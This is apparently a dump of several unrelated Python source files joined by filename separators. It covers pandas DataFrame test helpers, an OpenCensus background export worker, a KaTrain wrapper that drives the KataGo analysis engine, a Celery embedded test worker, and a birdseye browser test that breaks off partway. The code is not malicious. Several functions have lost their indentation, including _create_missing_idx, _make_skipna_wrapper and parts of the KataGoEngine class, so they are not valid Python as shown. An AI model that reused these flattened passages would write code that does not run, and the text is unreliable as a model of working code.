    Create a DataFrame using supplied parameters.

    Parameters
    ----------
    nrows, ncols - number of data rows/cols
    c_idx_names, r_idx_names - False/True/list of strings, yields No names ,
        default names or uses the provided names for the levels of the
        corresponding index. You can provide a single string when
        c_idx_nlevels ==1.
    c_idx_nlevels - number of levels in columns index. > 1 will yield MultiIndex
    r_idx_nlevels - number of levels in rows index. > 1 will yield MultiIndex
    data_gen_f - a function f(row,col) which return the data value
        at that position, the default generator used yields values of the form
        "RxCy" based on position.
    c_ndupe_l, r_ndupe_l - list of integers, determines the number
        of duplicates for each label at a given level of the corresponding
        index. The default `None` value produces a multiplicity of 1 across
        all levels, i.e. a unique index. Will accept a partial list of length
        N < idx_nlevels, for just the first N levels. If ndupe doesn't divide
        nrows/ncol, the last label might have lower multiplicity.
    dtype - passed to the DataFrame constructor as is, in case you wish to
        have more control in conjunction with a custom `data_gen_f`
    r_idx_type, c_idx_type - "i"/"f"/"s"/"u"/"dt"/"td".
        If idx_type is not None, `idx_nlevels` must be 1.
        "i"/"f" creates an integer/float index,
        "s"/"u" creates a string/unicode index
        "dt" create a datetime index.
        "td" create a timedelta index.
        if unspecified, string labels will be generated.

    Examples
    --------
    # 5 row, 3 columns, default names on both, single index on both axis
    >> makeCustomDataframe(5,3)
    # make the data a random int between 1 and 100
    >> mkdf(5,3,data_gen_f=lambda r,c:randint(1,100))
    # 2-level multiindex on rows with each label duplicated
    # twice on first level, default names on both axis, single
    # index on both axis
    >> a=makeCustomDataframe(5,3,r_idx_nlevels=2,r_ndupe_l=[2])
    # DatetimeIndex on row, index with unicode labels on columns
    # no names on either axis
    >> a=makeCustomDataframe(5,3,c_idx_names=False,r_idx_names=False,
                             r_idx_type="dt",c_idx_type="u")
    # 4-level multindex on rows with names provided, 2-level multindex
    # on columns with default labels and default names.
    >> a=makeCustomDataframe(5,3,r_idx_nlevels=4,
                             r_idx_names=["FEE","FI","FO","FAM"],
                             c_idx_nlevels=2)
    >> a=mkdf(5,3,r_idx_nlevels=2,c_idx_nlevels=4)
    """
    assert c_idx_nlevels > 0
    assert r_idx_nlevels > 0
    assert r_idx_type is None or (
        r_idx_type in ("i", "f", "s", "u", "dt", "p", "td") and r_idx_nlevels == 1
    )
    assert c_idx_type is None or (
        c_idx_type in ("i", "f", "s", "u", "dt", "p", "td") and c_idx_nlevels == 1
    )
    # column labels are prefixed "C", row labels "R", e.g. "C_l0_g0"
    columns = makeCustomIndex(
        ncols,
        nlevels=c_idx_nlevels,
        prefix="C",
        names=c_idx_names,
        ndupe_l=c_ndupe_l,
        idx_type=c_idx_type,
    )
    index = makeCustomIndex(
        nrows,
        nlevels=r_idx_nlevels,
        prefix="R",
        names=r_idx_names,
        ndupe_l=r_ndupe_l,
        idx_type=r_idx_type,
    )
    # by default, generate data based on location
    if data_gen_f is None:
        data_gen_f = lambda r, c: f"R{r}C{c}"
    data = [[data_gen_f(r, c) for c in range(ncols)] for r in range(nrows)]
    return DataFrame(data, index, columns, dtype=dtype)
def _create_missing_idx(nrows, ncols, density, random_state=None):
if random_state is None:
random_state = np.random
else:
random_state = np.random.RandomState(random_state)
# below is cribbed from scipy.sparse
size = round((1 - density) * nrows * ncols)
# generate a few more to ensure unique values
min_rows = 5
fac = 1.02
extra_size = min(size + min_rows, fac * size)
def _gen_unique_rand(rng, _extra_size):
ind = rng.rand(int(_extra_size))
return np.unique(np.floor(ind * nrows * ncols))[:size]
ind = _gen_unique_rand(random_state, extra_size)
while ind.size < size:
extra_size *= 1.05
ind = _gen_unique_rand(random_state, extra_size)
j = np.floor(ind * 1.0 / nrows).astype(int)
i = (ind - j * nrows).astype(int)
return i.tolist(), j.tolist()
def makeMissingDataframe(density=0.9, random_state=None):
    """Return makeDataFrame() output with ~(1 - density) of cells set to NaN."""
    df = makeDataFrame()
    i, j = _create_missing_idx(*df.shape, density=density, random_state=random_state)
    # writes through .values, i.e. mutates the underlying float block in place
    df.values[i, j] = np.nan
    return df
def test_parallel(num_threads=2, kwargs_list=None):
    """
    Decorator to run the same function multiple times in parallel.

    Parameters
    ----------
    num_threads : int, optional
        The number of times the function is run in parallel.
    kwargs_list : list of dicts, optional
        The list of kwargs to update original
        function kwargs on different threads.

    Notes
    -----
    This decorator does not pass the return value of the decorated function.
    Original from scikit-image:
    https://github.com/scikit-image/scikit-image/pull/1519
    """
    assert num_threads > 0
    has_kwargs_list = kwargs_list is not None
    if has_kwargs_list:
        assert len(kwargs_list) == num_threads
    import threading

    def wrapper(func):
        @wraps(func)
        def inner(*args, **kwargs):
            def kwargs_for(idx):
                # per-thread kwargs override the call-site kwargs
                if has_kwargs_list:
                    return dict(kwargs, **kwargs_list[idx])
                return kwargs

            workers = [
                threading.Thread(target=func, args=args, kwargs=kwargs_for(idx))
                for idx in range(num_threads)
            ]
            for worker in workers:
                worker.start()
            for worker in workers:
                worker.join()

        return inner

    return wrapper
class SubclassedSeries(Series):
    # Minimal Series subclass used to verify that pandas operations preserve
    # subclasses and propagate the attributes listed in _metadata.
    _metadata = ["testattr", "name"]
    @property
    def _constructor(self):
        return SubclassedSeries
    @property
    def _constructor_expanddim(self):
        # expanding to 2D (e.g. to_frame) yields the DataFrame subclass
        return SubclassedDataFrame
class SubclassedDataFrame(DataFrame):
    # Minimal DataFrame subclass; counterpart of SubclassedSeries for
    # subclass-preservation tests.
    _metadata = ["testattr"]
    @property
    def _constructor(self):
        return SubclassedDataFrame
    @property
    def _constructor_sliced(self):
        # slicing to 1D (e.g. selecting a column) yields the Series subclass
        return SubclassedSeries
class SubclassedCategorical(Categorical):
    # Minimal Categorical subclass for subclass-preservation tests.
    @property
    def _constructor(self):
        return SubclassedCategorical
def _make_skipna_wrapper(alternative, skipna_alternative=None):
"""
Create a function for calling on an array.
Parameters
----------
alternative : function
The function to be called on the array with no NaNs.
Only used when 'skipna_alternative' is None.
skipna_alternative : function
The function to be called on the original array
Returns
-------
function
"""
if skipna_alternative:
def skipna_wrapper(x):
return skipna_alternative(x.values)
else:
def skipna_wrapper(x):
nona = x.dropna()
if len(nona) == 0:
return np.nan
return alternative(nona)
return skipna_wrapper
def convert_rows_list_to_csv_str(rows_list: List[str]):
    """
    Convert list of CSV rows to single CSV-formatted string for current OS.

    This method is used for creating expected value of to_csv() method.

    Parameters
    ----------
    rows_list : List[str]
        Each element represents the row of csv.

    Returns
    -------
    str
        Expected output of to_csv() in current OS.
    """
    # join + trailing terminator; note an empty list yields just the
    # terminator, matching to_csv's trailing newline convention
    eol = os.linesep
    return eol.join(rows_list) + eol
def external_error_raised(expected_exception: Type[Exception]) -> ContextManager:
    """
    Helper function to mark pytest.raises that have an external error message.

    Parameters
    ----------
    expected_exception : Exception
        Expected error to raise.

    Returns
    -------
    Callable
        Regular `pytest.raises` function with `match` equal to `None`.
    """
    # local import keeps pytest out of the module's hard dependencies
    import pytest

    # match=None: the message comes from an external library, so assert
    # nothing about its contents -- only the exception type
    return pytest.raises(expected_exception, match=None)
# (name -> cython-implemented function) pairs from pandas' internal table,
# e.g. np.sum maps to "sum"
cython_table = pd.core.base.SelectionMixin._cython_table.items()
def get_cython_table_params(ndframe, func_names_and_expected):
    """
    Combine frame, functions from SelectionMixin._cython_table
    keys and expected result.

    Parameters
    ----------
    ndframe : DataFrame or Series
    func_names_and_expected : Sequence of two items
        The first item is a name of a NDFrame method ('sum', 'prod') etc.
        The second item is the expected return value.

    Returns
    -------
    list
        List of three items (DataFrame, function, expected result)
    """
    results = []
    for func_name, expected in func_names_and_expected:
        results.append((ndframe, func_name, expected))
        # also emit each callable that the cython table maps to this name
        results += [
            (ndframe, func, expected)
            for func, name in cython_table
            if name == func_name
        ]
    return results
def get_op_from_name(op_name: str) -> Callable:
    """
    The operator function for a given op name.

    Parameters
    ----------
    op_name : string
        The op name, in form of "add" or "__add__".

    Returns
    -------
    function
        A function performing the operation.
    """
    short_opname = op_name.strip("_")
    if hasattr(operator, short_opname):
        return getattr(operator, short_opname)
    # no such operator: assume a reversed op, e.g. "radd" -> operator.add
    # with its arguments swapped
    rop = getattr(operator, short_opname[1:])

    def op(x, y):
        return rop(y, x)

    return op
# -----------------------------------------------------------------------------
# Indexing test helpers
def getitem(x):
    """Identity: exercise plain obj[...] indexing."""
    return x
def setitem(x):
    """Identity: exercise plain obj[...] = ... assignment."""
    return x
def loc(x):
    """Return the object's .loc indexer."""
    return x.loc
def iloc(x):
    """Return the object's .iloc indexer."""
    return x.iloc
def at(x):
    """Return the object's .at indexer."""
    return x.at
def iat(x):
    """Return the object's .iat indexer."""
    return x.iat
|
async_.py | # Copyright 2018, OpenCensus Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from six.moves import queue, range
import atexit
import logging
import threading
from opencensus.common.transports import base
from opencensus.trace import execution_context
_DEFAULT_GRACE_PERIOD = 5.0 # Seconds
_DEFAULT_MAX_BATCH_SIZE = 600
_DEFAULT_WAIT_PERIOD = 60.0 # Seconds
_WORKER_THREAD_NAME = 'opencensus.common.Worker'
_WORKER_TERMINATOR = object()
logger = logging.getLogger(__name__)
class _Worker(object):
    """A background thread that exports batches of data.

    :type exporter: :class:`~opencensus.trace.base_exporter.Exporter` or
        :class:`~opencensus.stats.base_exporter.StatsExporter`
    :param exporter: Instance of Exporter object.

    :type grace_period: float
    :param grace_period: The amount of time to wait for pending data to
        be submitted when the process is shutting down.

    :type max_batch_size: int
    :param max_batch_size: The maximum number of items to send at a time
        in the background thread.

    :type wait_period: int
    :param wait_period: The amount of time to wait before sending the next
        batch of data.
    """
    def __init__(self, exporter,
                 grace_period=_DEFAULT_GRACE_PERIOD,
                 max_batch_size=_DEFAULT_MAX_BATCH_SIZE,
                 wait_period=_DEFAULT_WAIT_PERIOD):
        self.exporter = exporter
        self._grace_period = grace_period
        self._max_batch_size = max_batch_size
        self._wait_period = wait_period
        # unbounded queue of pending export items
        self._queue = queue.Queue(0)
        # guards thread start transitions
        self._lock = threading.Lock()
        # set at process exit to switch to drain-immediately mode
        self._event = threading.Event()
        self._thread = None
    @property
    def is_alive(self):
        """Returns True if the background thread is running."""
        return self._thread is not None and self._thread.is_alive()
    def _get_items(self):
        """Get multiple items from a Queue.

        Gets at least one (blocking) and at most ``max_batch_size`` items
        (non-blocking) from a given Queue. Does not mark the items as done.

        :rtype: Sequence
        :returns: A sequence of items retrieved from the queue.
        """
        items = [self._queue.get()]
        while len(items) < self._max_batch_size:
            try:
                items.append(self._queue.get_nowait())
            except queue.Empty:
                break
        return items
    def _thread_main(self):
        """The entry point for the worker thread.

        Pulls pending data off the queue and writes them in
        batches to the specified tracing backend using the exporter.
        """
        # Indicate that this thread is an exporter thread.
        # Used to suppress tracking of requests in this thread
        execution_context.set_is_exporter(True)
        quit_ = False
        while True:
            items = self._get_items()
            data = []
            for item in items:
                if item is _WORKER_TERMINATOR:
                    quit_ = True
                    # Continue processing items, don't break, try to process
                    # all items we got back before quitting.
                else:
                    data.extend(item)
            if data:
                try:
                    self.exporter.emit(data)
                except Exception:
                    # never let an exporter error kill the worker thread;
                    # the whole batch is dropped and logged
                    logger.exception(
                        '%s failed to emit data.'
                        'Dropping %s objects from queue.',
                        self.exporter.__class__.__name__,
                        len(data))
                    pass
            # mark every dequeued item done so Queue.join()/flush() unblocks
            for _ in range(len(items)):
                self._queue.task_done()
            # self._event is set at exit, at which point we start draining the
            # queue immediately. If self._event is unset, block for
            # self.wait_period between each batch of exports.
            self._event.wait(self._wait_period)
            if quit_:
                break
    def start(self):
        """Starts the background thread.

        Additionally, this registers a handler for process exit to attempt
        to send any pending data before shutdown.
        """
        with self._lock:
            if self.is_alive:
                return
            # daemon thread so a stuck exporter cannot block interpreter exit
            self._thread = threading.Thread(
                target=self._thread_main, name=_WORKER_THREAD_NAME)
            self._thread.daemon = True
            self._thread.start()
            atexit.register(self._export_pending_data)
    def stop(self):
        """Signals the background thread to stop.

        This does not terminate the background thread. It simply queues the
        stop signal. If the main process exits before the background thread
        processes the stop signal, it will be terminated without finishing
        work. The ``grace_period`` parameter will give the background
        thread some time to finish processing before this function returns.

        :rtype: bool
        :returns: True if the thread terminated. False if the thread is still
            running.
        """
        if not self.is_alive:
            return True
        with self._lock:
            self._queue.put_nowait(_WORKER_TERMINATOR)
            self._thread.join(timeout=self._grace_period)
            # join may have timed out; report whether the thread really ended
            success = not self.is_alive
            self._thread = None
        return success
    def _export_pending_data(self):
        """Callback that attempts to send pending data before termination."""
        if not self.is_alive:
            return
        # Stop blocking between export batches
        self._event.set()
        self.stop()
    def enqueue(self, data):
        """Queues data to be written by the background thread."""
        self._queue.put_nowait(data)
    def flush(self):
        """Submit any pending data."""
        # blocks until task_done() has been called for every queued item
        self._queue.join()
class AsyncTransport(base.Transport):
    """Asynchronous transport that uses a background thread.

    :type exporter: :class:`~opencensus.trace.base_exporter.Exporter` or
        :class:`~opencensus.stats.base_exporter.StatsExporter`
    :param exporter: Instance of Exporter object.

    :type grace_period: float
    :param grace_period: The amount of time to wait for pending data to
        be submitted when the process is shutting down.

    :type max_batch_size: int
    :param max_batch_size: The maximum number of items to send at a time
        in the background thread.

    :type wait_period: int
    :param wait_period: The amount of time to wait before sending the next
        batch of data.
    """
    def __init__(self, exporter,
                 grace_period=_DEFAULT_GRACE_PERIOD,
                 max_batch_size=_DEFAULT_MAX_BATCH_SIZE,
                 wait_period=_DEFAULT_WAIT_PERIOD):
        self.exporter = exporter
        # worker thread starts consuming the queue immediately
        self.worker = _Worker(
            exporter,
            grace_period,
            max_batch_size,
            wait_period,
        )
        self.worker.start()
    def export(self, data):
        """Put the trace/stats to be exported into queue."""
        self.worker.enqueue(data)
    def flush(self):
        """Submit any pending traces/stats."""
        self.worker.flush()
|
engine.py | import copy
import json
import os
import subprocess
import threading
import time
import traceback
from typing import Callable, Optional, Dict
from katrain.core.constants import OUTPUT_DEBUG, OUTPUT_ERROR, OUTPUT_EXTRA_DEBUG, OUTPUT_KATAGO_STDERR
from katrain.core.game_node import GameNode
from katrain.core.lang import i18n
from katrain.core.utils import find_package_resource
from kivy.utils import platform
class EngineDiedException(Exception):
    """Raised when the KataGo process exits or its pipes break unexpectedly."""
    pass
class KataGoEngine:
"""Starts and communicates with the KataGO analysis engine"""
# TODO: we don't support suicide in game.py, so no "tt": "tromp-taylor", "nz": "new-zealand"
RULESETS_ABBR = [("jp", "japanese"), ("cn", "chinese"), ("ko", "korean"), ("aga", "aga")]
RULESETS = {fromkey: name for abbr, name in RULESETS_ABBR for fromkey in [abbr, name]}
@staticmethod
def get_rules(node):
return KataGoEngine.RULESETS.get(str(node.ruleset).lower(), "japanese")
    def __init__(self, katrain, config, override_command=None):
        """Resolve the KataGo executable/model/config paths and launch the engine.

        :param katrain: host application object, used for logging and state updates.
        :param config: engine config section (katago/model/config paths, threads, ...).
        :param override_command: full analysis command line; skips path resolution.
        """
        self.katrain = katrain
        self.queries = {}  # outstanding query id -> start time and callback
        self.config = config
        self.query_counter = 0
        self.katago_process = None
        self.base_priority = 0
        self.override_settings = {"reportAnalysisWinratesAs": "BLACK"}  # force these settings
        self._lock = threading.Lock()
        self.analysis_thread = None
        self.stderr_thread = None
        if override_command:
            self.command = override_command
        else:
            exe = config["katago"].strip()
            if not exe:
                # fall back to the bundled binary for the current platform
                if platform == "win":
                    exe = "katrain/KataGo/katago.exe"
                elif platform == "linux":
                    exe = "katrain/KataGo/katago"
                else:  # e.g. MacOS after brewing
                    exe = "katago"
            model = find_package_resource(config["model"])
            cfg = find_package_resource(config["config"])
            if exe.startswith("katrain"):
                exe = find_package_resource(exe)
            exepath, exename = os.path.split(exe)
            # validate each required file; log and bail out without starting
            if exepath and not os.path.isfile(exe):
                self.katrain.log(i18n._("Kata exe not found").format(exe=exe), OUTPUT_ERROR)
                return  # don't start
            elif not exepath and not any(
                os.path.isfile(os.path.join(path, exe)) for path in os.environ.get("PATH", "").split(os.pathsep)
            ):
                self.katrain.log(i18n._("Kata exe not found in path").format(exe=exe), OUTPUT_ERROR)
                return  # don't start
            elif not os.path.isfile(model):
                self.katrain.log(i18n._("Kata model not found").format(model=model), OUTPUT_ERROR)
                return  # don't start
            elif not os.path.isfile(cfg):
                self.katrain.log(i18n._("Kata config not found").format(config=cfg), OUTPUT_ERROR)
                return  # don't start
            self.command = f'"{exe}" analysis -model "{model}" -config "{cfg}" -analysis-threads {config["threads"]}'
        self.start()
def start(self):
try:
self.katrain.log(f"Starting KataGo with {self.command}", OUTPUT_DEBUG)
self.katago_process = subprocess.Popen(
self.command, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True
)
except (FileNotFoundError, PermissionError, OSError) as e:
self.katrain.log(
i18n._("Starting Kata failed").format(command=self.command, error=e), OUTPUT_ERROR,
)
return # don't start
self.analysis_thread = threading.Thread(target=self._analysis_read_thread, daemon=True).start()
self.stderr_thread = threading.Thread(target=self._read_stderr_thread, daemon=True).start()
    def on_new_game(self):
        """Discard outstanding queries when a new game starts."""
        # bumping base_priority distinguishes new queries from stale ones
        self.base_priority += 1
        self.queries = {}
    def restart(self):
        """Drop all outstanding queries and relaunch the KataGo process."""
        self.queries = {}
        self.shutdown(finish=False)
        self.start()
def check_alive(self, os_error="", exception_if_dead=False):
ok = self.katago_process and self.katago_process.poll() is None
if not ok and exception_if_dead:
if self.katago_process:
os_error += f"status {self.katago_process and self.katago_process.poll()}"
died_msg = i18n._("Engine died unexpectedly").format(error=os_error)
self.katrain.log(died_msg, OUTPUT_ERROR)
self.katago_process = None
else:
died_msg = i18n._("Engine died unexpectedly").format(error=os_error)
raise EngineDiedException(died_msg)
return ok
    def shutdown(self, finish=False):
        """Terminate the KataGo process and join the reader threads.

        :param finish: when True, wait for outstanding queries to drain
            (or the process to die) before terminating.
        """
        process = self.katago_process
        if finish and process:
            while self.queries and process.poll() is None:
                time.sleep(0.1)
        if process:
            # clear the attribute first so the reader-thread loops exit
            self.katago_process = None
            process.terminate()
        if self.stderr_thread:
            self.stderr_thread.join()
        if self.analysis_thread:
            self.analysis_thread.join()
    def is_idle(self):
        """Return True when no queries are outstanding."""
        return not self.queries
    def _read_stderr_thread(self):
        """Forward KataGo's stderr lines to the app log until the process ends."""
        while self.katago_process is not None:
            try:
                line = self.katago_process.stderr.readline()
                if line:
                    try:
                        self.katrain.log(line.decode(errors="ignore").strip(), OUTPUT_KATAGO_STDERR)
                    except Exception as e:
                        print("ERROR in processing KataGo stderr:", line, "Exception", e)
                elif self.katago_process:
                    # empty read means EOF: the process most likely died
                    self.check_alive(exception_if_dead=True)
            except Exception as e:
                self.katrain.log(f"Exception in reading stdout {e}", OUTPUT_DEBUG)
                return
def _analysis_read_thread(self):
while self.katago_process is not None:
try:
line = self.katago_process.stdout.readline()
if self.katago_process and not line:
self.check_alive(exception_if_dead=True)
except OSError as e:
self.check_alive(os_error=str(e), exception_if_dead=True)
return
if b"Uncaught exception" in line:
self.katrain.log(f"KataGo Engine Failed: {line.decode(errors='ignore')}", OUTPUT_ERROR)
return
if not line:
continue
try:
analysis = json.loads(line)
if analysis["id"] not in self.queries:
self.katrain.log(f"Query result {analysis['id']} discarded -- recent new game?", OUTPUT_DEBUG)
continue
query_id = analysis["id"]
callback, error_callback, start_time, next_move = self.queries[query_id]
if "error" in analysis:
del self.queries[query_id]
if error_callback:
error_callback(analysis)
elif not (next_move and "Illegal move" in analysis["error"]): # sweep
self.katrain.log(f"{analysis} received from KataGo", OUTPUT_ERROR)
elif "warning" in analysis:
self.katrain.log(f"{analysis} received from KataGo", OUTPUT_DEBUG)
else:
del self.queries[query_id]
time_taken = time.time() - start_time
self.katrain.log(
f"[{time_taken:.1f}][{analysis['id']}] KataGo Analysis Received: {analysis.keys()}",
OUTPUT_DEBUG,
)
self.katrain.log(line, OUTPUT_EXTRA_DEBUG)
try:
callback(analysis)
except Exception as e:
self.katrain.log(f"Error in engine callback for query {query_id}: {e}", OUTPUT_ERROR)
if getattr(self.katrain, "update_state", None): # easier mocking etc
self.katrain.update_state()
except Exception as e:
traceback.print_exc(e)
self.katrain.log(f"Unexpected exception {e} while processing KataGo output {line}", OUTPUT_ERROR)
    def send_query(self, query, callback, error_callback, next_move=None):
        """Register callbacks for a query and write it to KataGo's stdin.

        Assigns an auto-incrementing id when the query has none; the lock
        serializes id allocation and the queries-dict update.
        (NOTE(review): block structure reconstructed from flattened
        indentation -- confirm the lock scope against upstream.)
        """
        with self._lock:
            self.query_counter += 1
            if "id" not in query:
                query["id"] = f"QUERY:{str(self.query_counter)}"
            self.queries[query["id"]] = (callback, error_callback, time.time(), next_move)
        if self.katago_process:
            self.katrain.log(f"Sending query {query['id']}: {json.dumps(query)}", OUTPUT_DEBUG)
            try:
                self.katago_process.stdin.write((json.dumps(query) + "\n").encode())
                self.katago_process.stdin.flush()
            except OSError as e:
                self.check_alive(os_error=str(e), exception_if_dead=True)
                return  # do not raise, since there's nothing to catch it
    def request_analysis(
        self,
        analysis_node: GameNode,
        callback: Callable,
        error_callback: Optional[Callable] = None,
        visits: int = None,
        analyze_fast: bool = False,
        time_limit=True,
        priority: int = 0,
        ownership: Optional[bool] = None,
        next_move: Optional[GameNode] = None,
        extra_settings: Optional[Dict] = None,
    ):
        """Build a KataGo analysis query for a node's position and send it.

        :param analysis_node: node whose position (root placements + moves) is analyzed.
        :param callback: called with the analysis dict on success.
        :param error_callback: called with the response when KataGo reports an error.
        :param visits: max visits; defaults from config (fast_visits when analyze_fast).
        :param time_limit: when True, apply the configured maxTime setting.
        :param priority: added to base_priority (bumped on new game to mark old queries stale).
        :param ownership: request the ownership map; defaults from config, off for next_move.
        :param next_move: when set, evaluate this follow-up move (policy/ownership off).
        :param extra_settings: additional KataGo overrideSettings entries.
        """
        moves = [m for node in analysis_node.nodes_from_root for m in node.moves]
        initial_stones = analysis_node.root.placements
        if next_move:
            moves.append(next_move)
        if ownership is None:
            ownership = self.config["_enable_ownership"] and not next_move
        if visits is None:
            visits = self.config["max_visits"]
            if analyze_fast and self.config.get("fast_visits"):
                visits = self.config["fast_visits"]
        size_x, size_y = analysis_node.board_size
        settings = copy.copy(self.override_settings)
        if time_limit:
            settings["maxTime"] = self.config["max_time"]
        if self.config.get("wide_root_noise", 0.0) > 0.0:  # don't send if 0.0, so older versions don't error
            settings["wideRootNoise"] = self.config["wide_root_noise"]
        query = {
            "rules": self.get_rules(analysis_node),
            "priority": self.base_priority + priority,
            "analyzeTurns": [len(moves)],
            "maxVisits": visits,
            "komi": analysis_node.komi,
            "boardXSize": size_x,
            "boardYSize": size_y,
            "includeOwnership": ownership and not next_move,
            "includePolicy": not next_move,
            "initialStones": [[m.player, m.gtp()] for m in initial_stones],
            "moves": [[m.player, m.gtp()] for m in moves],
            "overrideSettings": {**settings, **(extra_settings or {})},
        }
        self.send_query(query, callback, error_callback, next_move)
        # record the deepest analysis requested so far for this node
        analysis_node.analysis_visits_requested = max(analysis_node.analysis_visits_requested, visits)
|
worker.py | """Embedded workers for integration tests."""
from __future__ import absolute_import, unicode_literals
import os
import threading
from contextlib import contextmanager
from celery import worker
from celery.result import _set_task_join_will_block, allow_join_result
from celery.utils.dispatch import Signal
from celery.utils.nodenames import anon_nodename
WORKER_LOGLEVEL = os.environ.get('WORKER_LOGLEVEL', 'error')
test_worker_starting = Signal(
name='test_worker_starting',
providing_args={},
)
test_worker_started = Signal(
name='test_worker_started',
providing_args={'worker', 'consumer'},
)
test_worker_stopped = Signal(
name='test_worker_stopped',
providing_args={'worker'},
)
class TestWorkController(worker.WorkController):
    """Worker that can synchronize on being fully started."""
    def __init__(self, *args, **kwargs):
        # type: (*Any, **Any) -> None
        # create the event before super().__init__, since startup may
        # trigger on_consumer_ready
        self._on_started = threading.Event()
        super(TestWorkController, self).__init__(*args, **kwargs)
    def on_consumer_ready(self, consumer):
        # type: (celery.worker.consumer.Consumer) -> None
        """Callback called when the Consumer blueprint is fully started."""
        self._on_started.set()
        test_worker_started.send(
            sender=self.app, worker=self, consumer=consumer)
    def ensure_started(self):
        # type: () -> None
        """Wait for worker to be fully up and running.

        Warning:
            Worker must be started within a thread for this to work,
            or it will block forever.
        """
        self._on_started.wait()
@contextmanager
def start_worker(
        app,  # type: Celery
        concurrency=1,  # type: int
        pool='solo',  # type: str
        loglevel=WORKER_LOGLEVEL,  # type: Union[str, int]
        logfile=None,  # type: str
        perform_ping_check=True,  # type: bool
        ping_task_timeout=10.0,  # type: float
        **kwargs  # type: Any
):
    # type: (...) -> Iterable
    """Start embedded worker.

    Yields:
        celery.app.worker.Worker: worker instance.
    """
    test_worker_starting.send(sender=app)
    with _start_worker_thread(app,
                              concurrency=concurrency,
                              pool=pool,
                              loglevel=loglevel,
                              logfile=logfile,
                              perform_ping_check=perform_ping_check,
                              **kwargs) as worker:
        if perform_ping_check:
            from .tasks import ping
            # round-trip a task to prove the worker actually consumes
            with allow_join_result():
                assert ping.delay().get(timeout=ping_task_timeout) == 'pong'
        yield worker
    test_worker_stopped.send(sender=app, worker=worker)
@contextmanager
def _start_worker_thread(app,
                         concurrency=1,
                         pool='solo',
                         loglevel=WORKER_LOGLEVEL,
                         logfile=None,
                         WorkController=TestWorkController,
                         perform_ping_check=True,
                         **kwargs):
    # type: (Celery, int, str, Union[str, int], str, Any, **Any) -> Iterable
    """Start Celery worker in a thread.

    Yields:
        celery.worker.Worker: worker instance.
    """
    setup_app_for_worker(app, loglevel, logfile)
    if perform_ping_check:
        assert 'celery.ping' in app.tasks
    # Make sure we can connect to the broker
    with app.connection(hostname=os.environ.get('TEST_BROKER')) as conn:
        # NOTE(review): attribute access only, no call -- presumably this is
        # just to force the connection/channel to be established eagerly;
        # confirm the missing () is intentional.
        conn.default_channel.queue_declare
    worker = WorkController(
        app=app,
        concurrency=concurrency,
        hostname=anon_nodename(),
        pool=pool,
        loglevel=loglevel,
        logfile=logfile,
        # not allowed to override TestWorkController.on_consumer_ready
        ready_callback=None,
        without_heartbeat=True,
        without_mingle=True,
        without_gossip=True,
        **kwargs)
    # Run the worker in a daemon-less thread and block until it is ready.
    t = threading.Thread(target=worker.start)
    t.start()
    worker.ensure_started()
    _set_task_join_will_block(False)
    yield worker
    # Signal the worker's main loop to terminate, then wait up to 10s.
    from celery.worker import state
    state.should_terminate = 0
    t.join(10)
    state.should_terminate = None
@contextmanager
def _start_worker_process(app,
                          concurrency=1,
                          pool='solo',
                          loglevel=WORKER_LOGLEVEL,
                          logfile=None,
                          **kwargs):
    # type: (Celery, int, str, Union[int, str], str, **Any) -> Iterable
    """Start worker in separate process.

    Yields:
        celery.app.worker.Worker: worker instance.

    NOTE(review): as written, concurrency/pool/loglevel/logfile/kwargs are
    accepted but never used, and the context manager yields None rather
    than a worker instance -- confirm whether callers rely on either.
    """
    from celery.apps.multi import Cluster, Node
    app.set_current()
    cluster = Cluster([Node('testworker1@%h')])
    cluster.start()
    yield
    cluster.stopwait()
def setup_app_for_worker(app, loglevel, logfile):
    # type: (Celery, Union[str, int], str) -> None
    """Prepare *app* so an embedded worker can be started against it."""
    for prepare in (app.finalize, app.set_current, app.set_default):
        prepare()
    # Reset the cached logging state so setup() runs again for this worker.
    type(app.log)._setup = False
    app.log.setup(loglevel=loglevel, logfile=logfile)
|
test_interface.py | from future.standard_library import install_aliases
install_aliases()
import tests
str(tests)
from time import sleep
import requests
from littleutils import only
from selenium.webdriver import ActionChains
from selenium.webdriver.chrome.options import Options
from birdseye import eye
import unittest
from threading import Thread
from birdseye.server import app
from selenium import webdriver
import os
@eye
def foo():
    # Fixture traced by birdseye: TestInterface asserts on these exact
    # source expressions ('i * 13 + j * 17', 'x', 'bar()', 'assert j') and
    # on the loop bounds, so this source must not be reformatted.
    for i in range(20):
        for j in range(3):
            int(i * 13 + j * 17)
            if i > 0:
                try:
                    assert j
                except AssertionError:
                    # j == 0 fails the assert; swallowed so all iterations run.
                    pass
    str(bar())
    x = list(range(1, 30, 2))
    list(x)
@eye
def bar():
    # Intentionally empty: exists so the UI test can follow an inner call.
    pass
class TestInterface(unittest.TestCase):
    """End-to-end browser test of the birdseye web UI (requires Chrome)."""

    maxDiff = None

    def setUp(self):
        # Headless Chrome; --no-sandbox is required in containerized CI.
        chrome_options = Options()
        chrome_options.add_argument("--headless")
        chrome_options.add_argument("--no-sandbox")
        self.driver = webdriver.Chrome(options=chrome_options)
        self.driver.set_window_size(1400, 1000)
        self.driver.implicitly_wait(2)
        if not os.environ.get('BIRDSEYE_SERVER_RUNNING'):
            # Run the birdseye server in-process unless one is already up.
            Thread(target=lambda: app.run(port=7777)).start()

    def test(self):
        try:
            self._do_test()
        except:
            # Keep a screenshot for debugging before re-raising.
            self.driver.save_screenshot('error_screenshot.png')
            raise

    def _do_test(self):
        """Drive the UI: index -> file -> call pages, then inspect traced values."""
        foo()
        driver = self.driver
        # On the index page, note the links to the function and call
        driver.get('http://localhost:7777/')
        function_link = driver.find_element_by_link_text('foo')
        function_url = function_link.get_attribute('href')
        call_url = function_link.find_element_by_xpath('..//i/..').get_attribute('href')
        # On the file page, check that the links still match
        driver.find_element_by_partial_link_text('test_interface').click()
        function_link = driver.find_element_by_link_text('foo')
        self.assertEqual(function_link.get_attribute('href'), function_url)
        self.assertEqual(call_url, function_link.find_element_by_xpath('..//i/..').get_attribute('href'))
        # Finally navigate to the call and check the original call_url
        function_link.click()
        driver.find_element_by_css_selector('table a').click()
        self.assertEqual(driver.current_url, call_url)
        # Test hovering, clicking on expressions, and stepping through loops
